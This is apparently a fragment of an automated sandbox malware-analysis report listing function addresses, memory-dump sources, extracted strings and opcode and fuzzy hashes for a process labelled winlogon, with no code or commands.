                                  • Opcode Fuzzy Hash: 83ba5a0207d450670f036ed36d689e1ff3a7bc282e49bf432718031162f16348
                                  • Instruction Fuzzy Hash: E2419170E18A4A9FEB48FB6894556FDBBA1FF88300F9445B9D009D32C6CE3868458B50
                                  Function 00007FF848E91AA1 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20045d241c90d2f759c98a826407f07ea700e3511093f02c32df6a2e72e30248
                                  • Instruction ID: e9de7b835c096ea3706811e17259e24f398244885ccef2d0caf4346113d56e55
                                  • Opcode Fuzzy Hash: 20045d241c90d2f759c98a826407f07ea700e3511093f02c32df6a2e72e30248
                                  • Instruction Fuzzy Hash: 4901761090CBC00FF345B63828110757FE0EFA26A0F0806EAE888C71D3E9989D848396

                                  Non-executed Functions

                                  Function 00007FF848E906FA Relevance: 7.6, Strings: 6, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2794920253.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7ff848e90000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: =L_^$L_^^$L_^h$L_^j$L_^|$L_^~
                                  • API String ID: 0-958985322
                                  • Opcode ID: d05d35fba308552a9d046902c083e34e9dd99b3ad879980ec84614eb5b1b6f1a
                                  • Instruction ID: 690be458a221c57cbd1f2aaaf4ecb7b48e48cf97440c45fb9c11844a9af7a028
                                  • Opcode Fuzzy Hash: d05d35fba308552a9d046902c083e34e9dd99b3ad879980ec84614eb5b1b6f1a
                                  • Instruction Fuzzy Hash: 5031EBF7ACD9166DE20A72BCB4411EC2341EF803F8F4DA572D1588A083CF68604A89E9

                                  Executed Functions

                                  Function 00007FF848E807FA Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <M_^
                                  • API String ID: 0-1376500734
                                  • Opcode ID: 326fd95ac9da95b702e79b716dbef10633fe1929b80445b4a98ee25557eba88f
                                  • Instruction ID: 0f4b9c6a9c200d5ce0c92596f7a294ee1889353c817e65e28517ac71a4f5890d
                                  • Opcode Fuzzy Hash: 326fd95ac9da95b702e79b716dbef10633fe1929b80445b4a98ee25557eba88f
                                  • Instruction Fuzzy Hash: AE412662A4AE4E6FD348B72C94650E97FB1FF85350F8841B6D449C3387EF24A8028769
                                  Function 00007FF848E810FA Relevance: .7, Instructions: 692COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b73442ecfed00538ca87fc2f0ecf6324a24dda30b416f7ff7a175ba32b5f0382
                                  • Instruction ID: 916b202eda5ba96213f9e92e9a6f7e47471a27ef22097660c97c69e4e2ee0b8b
                                  • Opcode Fuzzy Hash: b73442ecfed00538ca87fc2f0ecf6324a24dda30b416f7ff7a175ba32b5f0382
                                  • Instruction Fuzzy Hash: 6D12A061E1DD4A5FEB98F73894256BDA7D2FF48780F8404B9D04EC32C7DE29A8018755
                                  Function 00007FF848E81120 Relevance: .6, Instructions: 624COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc9a651ae84c0150e3d3d0d8b59c2ef40dfbdbfcc5c815f04ca3360088381bae
                                  • Instruction ID: 8ca567d8178178d1a51b7529c285941354281cecb75bc9c6b90fc0a240a55448
                                  • Opcode Fuzzy Hash: cc9a651ae84c0150e3d3d0d8b59c2ef40dfbdbfcc5c815f04ca3360088381bae
                                  • Instruction Fuzzy Hash: 6C028E21E1DD4A5FEB98F73894296BD67E2FF48780F8404B9D04EC32D6DE39A8018755
                                  Function 00007FF848E8190E Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e95d337f9ee8934f1c244495522fc73034388a73c5b736f1dbaa27866886ab2f
                                  • Instruction ID: 693de194179082cabe5e15e1a5b1c0c99ba70d9ad25901286ef1695b73edd8e6
                                  • Opcode Fuzzy Hash: e95d337f9ee8934f1c244495522fc73034388a73c5b736f1dbaa27866886ab2f
                                  • Instruction Fuzzy Hash: EB51F420A0EAC91FD786A7785869279BFD2EF9A650F0901FFE04DC71A7DD588C06C312
                                  Function 00007FF848E80C5E Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 932e44de9e0c6f2714dc28c40b08c1fce1e19d15f989266d2bbea3ef341435a5
                                  • Instruction ID: 423b750be4486758d0a6614464b9969d04ab989f8ceadad0f40a43fafdacc3ad
                                  • Opcode Fuzzy Hash: 932e44de9e0c6f2714dc28c40b08c1fce1e19d15f989266d2bbea3ef341435a5
                                  • Instruction Fuzzy Hash: 77513721A1EACA5FE396B73C48162797BD2EF86650B4900FAD48CC7197DD2C9C438322
                                  Function 00007FF848E80588 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad37905b66bc5ccec15752e29f9da5d03fe2c0da47725ea234f506424a7e0d4b
                                  • Instruction ID: 8414ac0763b2c9e5da2b7c4d5f05cb09efa8099f7a64b6d507f6347a3e09ba55
                                  • Opcode Fuzzy Hash: ad37905b66bc5ccec15752e29f9da5d03fe2c0da47725ea234f506424a7e0d4b
                                  • Instruction Fuzzy Hash: 1031B120B1D9495FE798EB2C9469279B7D2EFA9751F0805BAE00EC3297DE689C028345
                                  Function 00007FF848E80AF1 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21aa05fad5b2cf0690abc2977e4dac812ab474e325e523737c43d804d2534a34
                                  • Instruction ID: a4271717deca464ddb07f89cc1e5f6d6425a6c0bb692c5e7470436966664ccce
                                  • Opcode Fuzzy Hash: 21aa05fad5b2cf0690abc2977e4dac812ab474e325e523737c43d804d2534a34
                                  • Instruction Fuzzy Hash: 5531D421E1DD4A9FE788BB78581A3BDB6D2FF98791F544176E00DC3283DE3858018B62
                                  Function 00007FF848E809A9 Relevance: .1, Instructions: 113COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2edb02a492b34f0b8dc8b10296f30486c2a2dd3cd4c6faba7bbe906b8bd2a8ad
                                  • Instruction ID: 2197bb6ed832a3bf47bf476a1e4905a6ff933077aa4f83b4665284e76b22f01e
                                  • Opcode Fuzzy Hash: 2edb02a492b34f0b8dc8b10296f30486c2a2dd3cd4c6faba7bbe906b8bd2a8ad
                                  • Instruction Fuzzy Hash: EC415E30E19A1E9FDB48FB6884656EEBBE1FF98300F944579D009D3286DE38A845CB54
                                  Function 00007FF848E81AA1 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f8a401fd90c9b5e54c7a4f8228fd08cb8e964b2ea1ec54985bced00115ecb56
                                  • Instruction ID: 09f1efc100e11160bd32444b329a475e3dce1de86ba9277d03a77b444771ee4c
                                  • Opcode Fuzzy Hash: 1f8a401fd90c9b5e54c7a4f8228fd08cb8e964b2ea1ec54985bced00115ecb56
                                  • Instruction Fuzzy Hash: E801761090DBC50FE342B63CA8550797FE0EF92790F4805EBE4C8C7197EA249D458396

                                  Non-executed Functions

                                  Function 00007FF848E806FA Relevance: 7.6, Strings: 6, Instructions: 116COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.3311365127.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_7ff848e80000_winlogon.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: =M_^$M_^^$M_^h$M_^j$M_^|$M_^~
                                  • API String ID: 0-1553104472
                                  • Opcode ID: 79ff1c6e10182ed32dbfce5d141e68628f334c8627946c2cbc28ae4298ab6ea5
                                  • Instruction ID: 2a64239209fbee03fc1019cf04bf893221cfd17ca2e6a6ef182c58060d40fa8a
                                  • Opcode Fuzzy Hash: 79ff1c6e10182ed32dbfce5d141e68628f334c8627946c2cbc28ae4298ab6ea5
                                  • Instruction Fuzzy Hash: 7331A7E7ACD456ADE20A72ACB4415EC3781EF507E4F8D5772D068CA0C3DF29604649F9